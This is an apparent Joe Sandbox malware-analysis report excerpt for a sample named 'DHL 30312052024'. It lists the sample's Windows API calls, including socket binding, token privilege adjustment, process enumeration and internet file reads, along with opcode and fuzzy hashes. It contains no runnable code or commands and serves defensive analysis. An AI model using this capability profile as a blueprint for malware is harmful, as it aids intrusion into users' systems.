                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C76330
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00C76344
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • _memmove.LIBCMT ref: 00C50258
                                                                                        • _memmove.LIBCMT ref: 00C5036D
                                                                                        • _memmove.LIBCMT ref: 00C50414
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1300846289-0
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C019FA
                                                                                        • GetSysColor.USER32(0000000F), ref: 00C01A4E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00C01A61
                                                                                          • Part of subcall function 00C01290: DefDlgProcW.USER32(?,00000020,?), ref: 00C012D8
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        APIs
                                                                                          • Part of subcall function 00C77D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C77DB6
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C7679E
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C767C7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00C76800
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C7680D
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00C76821
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C580C0
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C580CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C580D9
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C580E0
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C580F6
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 0700f847ab7265316bb425c67b7ab87187f2dad47b5980a2d265a51ede6c5d52
                                                                                        • Instruction ID: df86014bd4e19a6767765c0003c47de593378ff35fb45bf0b519d322950c8ec8
                                                                                        • Opcode Fuzzy Hash: 0700f847ab7265316bb425c67b7ab87187f2dad47b5980a2d265a51ede6c5d52
                                                                                        • Instruction Fuzzy Hash: 8AF06235240304EFEB104FA5EC8DF6F3BACEF4A755B100029F945D6150DB619D4AEB64
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C6C432
                                                                                        • CoCreateInstance.OLE32(00C92D6C,00000000,00000001,00C92BDC,?), ref: 00C6C44A
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • CoUninitialize.OLE32 ref: 00C6C6B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        • Opcode ID: 840341b12cbb30ccc14437b310032e96ab1be4e90793063381afc9eeb2a0428c
                                                                                        • Instruction ID: a3d3d1079ba70ac1145232f5df9f63778b29633e647975b92a950f898616ab80
                                                                                        • Opcode Fuzzy Hash: 840341b12cbb30ccc14437b310032e96ab1be4e90793063381afc9eeb2a0428c
                                                                                        • Instruction Fuzzy Hash: A0A11AB1104205AFD700EF54C881EAFB7E8EF95354F004A2DF595972E2EB71EA49CB62
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04AD0), ref: 00C04B45
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C04B57
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: 384ad8db6dffded6e40f1ae1f37f27d2f6d9175db3b53d2b11ccb58b0d88e7cb
                                                                                        • Instruction ID: d63a6f371dd45177ee9fcd84ebe4a319f2560758ed0c2d1cd8aa65cb7bcee960
                                                                                        • Opcode Fuzzy Hash: 384ad8db6dffded6e40f1ae1f37f27d2f6d9175db3b53d2b11ccb58b0d88e7cb
                                                                                        • Instruction Fuzzy Hash: A4D01775A10B13CFD720AF32E828B1A76E8AF45795B11883E9496D6190E674E881CB5C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 3cfac3ab97b5a5e00f1beaac3da5cea9ebe370490a346986493a6dad10914c2b
                                                                                        • Instruction ID: 95e270558ceff3508d47c4fdf02e6e325fc554bc99e5c409efc40b8ae1a493b0
                                                                                        • Opcode Fuzzy Hash: 3cfac3ab97b5a5e00f1beaac3da5cea9ebe370490a346986493a6dad10914c2b
                                                                                        • Instruction Fuzzy Hash: 16229C716083409FD724DF14C881BAEB7E4FF86314F10491DF89A97292DB71EA85DB92
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7EE3D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00C7EE4B
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00C7EF0B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C7EF1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        • Opcode ID: 22adf29e9ef972da01eb8ff574b203e1aafffe30eee78156498d4033d9b43978
                                                                                        • Instruction ID: 06222c86d2b5272cacf962aeec7905acfc331fcc6a2067edadc7f3e2c1a4b085
                                                                                        • Opcode Fuzzy Hash: 22adf29e9ef972da01eb8ff574b203e1aafffe30eee78156498d4033d9b43978
                                                                                        • Instruction Fuzzy Hash: 4D517B71508711AFD310EF24CC85F6BB7E8EF98710F10892DF595962A2EB70A909DB92
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C5E628
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        • Opcode ID: 3680ebffd77339e8bae74f83d1fca7dff0e7e641136c4c67288855a92fe1c159
                                                                                        • Instruction ID: 93c8fc7fe3af02ac35daf96e5c6020433bcef2d5b1e4ad44e697e38287cda4d1
                                                                                        • Opcode Fuzzy Hash: 3680ebffd77339e8bae74f83d1fca7dff0e7e641136c4c67288855a92fe1c159
                                                                                        • Instruction Fuzzy Hash: 3C322879A007059FD728DF19C48196AB7F1FF48310B15C56EE8AADB3A1DB70EA81CB44
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C7180A,00000000), ref: 00C723E1
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C72418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: cd4e7eb464dbdc17b8d25410e35434139c3755b09ce18e5638c632d9ae4b70b7
                                                                                        • Instruction ID: 72bd6eb96f3c7c6855433b1167b592011cc4b84913b7b92ade0bdc18740def0a
                                                                                        • Opcode Fuzzy Hash: cd4e7eb464dbdc17b8d25410e35434139c3755b09ce18e5638c632d9ae4b70b7
                                                                                        • Instruction Fuzzy Hash: 5841F671904209BFEB20DE95DC81FBFB7BCEB40324F10806EF659A7251DB759E41A660
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6B40B
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C6B465
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00C6B4B2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 211412a2b3ed74d37a7e6a389f450f03914cdeffe6df5359755b376e141ed7c2
                                                                                        • Instruction ID: 33639cb908f01ebcd651a54626c7dce88d0f70bce748b24512fb9365f6f8de9c
                                                                                        • Opcode Fuzzy Hash: 211412a2b3ed74d37a7e6a389f450f03914cdeffe6df5359755b376e141ed7c2
                                                                                        • Instruction Fuzzy Hash: 54216075A00108EFCB00EFA5D884BEDBBB8FF49310F1481A9E905EB392DB319956DB55
                                                                                        APIs
                                                                                          • Part of subcall function 00C20DB6: std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                          • Part of subcall function 00C20DB6: __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5882B
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C58858
                                                                                        • GetLastError.KERNEL32 ref: 00C58865
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 19fe29d003fb9b1a798ea5ef9c033b6a5f893b1b7069fbbee81b3a1d676554ff
                                                                                        • Instruction ID: 719046002b3dcc7052e2d74537bd058d3769e03a977b979810482c2f6c0629d9
                                                                                        • Opcode Fuzzy Hash: 19fe29d003fb9b1a798ea5ef9c033b6a5f893b1b7069fbbee81b3a1d676554ff
                                                                                        • Instruction Fuzzy Hash: 6511BFB2404204AFE718DFA4EC85E2BB7F8EB04311B20852EF85593652EB70BC458B64
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C58774
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C5878B
                                                                                        • FreeSid.ADVAPI32(?), ref: 00C5879B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 335811f02de739511982f8b0bea1eaecdb71bf47d1afbecb080f62858b7c2f78
                                                                                        • Instruction ID: b0b0a80ab1365dceb7f842185f5642acc33f60670e60d058418f93a8a3816ad5
                                                                                        • Opcode Fuzzy Hash: 335811f02de739511982f8b0bea1eaecdb71bf47d1afbecb080f62858b7c2f78
                                                                                        • Instruction Fuzzy Hash: 30F04975A1130CBFDF00DFF4DC89AAEBBBCEF08201F1044A9A901E2181E7756A488B54
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C6C6FB
                                                                                        • FindClose.KERNEL32(00000000), ref: 00C6C72B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 0987b1b7b80e319c5d297b55ad901b4ac648a7d1b42ee8c4c0ab6045b9c93f65
                                                                                        • Instruction ID: c8dc2be45f2226a1d3df439ad81aa1f501a06675f997e599a1a424e24abac10d
                                                                                        • Opcode Fuzzy Hash: 0987b1b7b80e319c5d297b55ad901b4ac648a7d1b42ee8c4c0ab6045b9c93f65
                                                                                        • Instruction Fuzzy Hash: 6B118E726002009FDB10DF29C885A2AF7E8EF85320F00C61DF9A9C73A1DB30A805CB81
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00C79468,?,00C8FB84,?), ref: 00C6A097
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00C79468,?,00C8FB84,?), ref: 00C6A0A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 27c7457e72708a1acfdd3b7c200a85062ac4c6f5f73e4bcc8b04a1e6f4a491d1
                                                                                        • Instruction ID: f3f242ce33594ba6135e2d31fb5cdaca16c2e66a6f4609945f26c1ea881d8897
                                                                                        • Opcode Fuzzy Hash: 27c7457e72708a1acfdd3b7c200a85062ac4c6f5f73e4bcc8b04a1e6f4a491d1
                                                                                        • Instruction Fuzzy Hash: 8BF0823551522DABDB21AFA4CC88FEE776CBF08361F00426AF919D6191DA309A40CBA1
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C58309), ref: 00C581E0
                                                                                        • CloseHandle.KERNEL32(?,?,00C58309), ref: 00C581F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 0c30078936569b6ce46d828c538dedc6fdf359bd1d6c303c20ce4c70d00ae564
                                                                                        • Instruction ID: dbc57c152cccf74307eb565d912d3d5b1d888d9523e4c7419419528c70b74bfe
                                                                                        • Opcode Fuzzy Hash: 0c30078936569b6ce46d828c538dedc6fdf359bd1d6c303c20ce4c70d00ae564
                                                                                        • Instruction Fuzzy Hash: F4E0E671010510AFE7252B60FC05E777BE9EF04311725882DF8A5C4471DB615CD1DB14
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00C28D57,?,?,?,00000001), ref: 00C2A15A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00C2A163
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 7e84f4737fef318447f0b7d23208bed80af1d815630e81a594182fac9dbc1940
                                                                                        • Instruction ID: 80a7117f44c2b0ed5352d5b44e18304710cde735bee43b24cf41d9d2e196b356
                                                                                        • Opcode Fuzzy Hash: 7e84f4737fef318447f0b7d23208bed80af1d815630e81a594182fac9dbc1940
                                                                                        • Instruction Fuzzy Hash: 8FB09231254308ABCA002B91EC09B8C3F68EB46AA2F404024F60D84070CB6264528B99
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 539a324b783c422d36ab7e5d51dd8cf55f122a484264644eebd32d25d098f17e
                                                                                        • Instruction ID: d0037017becae0723c6e16664c3f76f7995e31beb3ca90ad4c714e715c264e27
                                                                                        • Opcode Fuzzy Hash: 539a324b783c422d36ab7e5d51dd8cf55f122a484264644eebd32d25d098f17e
                                                                                        • Instruction Fuzzy Hash: 7332F231D2AF554ED7239634D836339A258AFB73C4F15D73BE82AB5DA5EB28C5834100
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 133d7729e60f72666e8d89df83d36f151349503f71e6aa9973afedc591cc390b
                                                                                        • Instruction ID: fe187e573cc930b7d474691c848a07603421c309feef2e26b47bd6b614815dc6
                                                                                        • Opcode Fuzzy Hash: 133d7729e60f72666e8d89df83d36f151349503f71e6aa9973afedc591cc390b
                                                                                        • Instruction Fuzzy Hash: F2B1EE31E2AF404DD7239639883533ABA5CAFBB6C5F51E71BFC2674D22EB2185834181
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 00C6889B
                                                                                          • Part of subcall function 00C2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C68F6E,00000000,?,?,?,?,00C6911F,00000000,?), ref: 00C25213
                                                                                          • Part of subcall function 00C2520A: __aulldiv.LIBCMT ref: 00C25233
                                                                                        Memory Dump Source
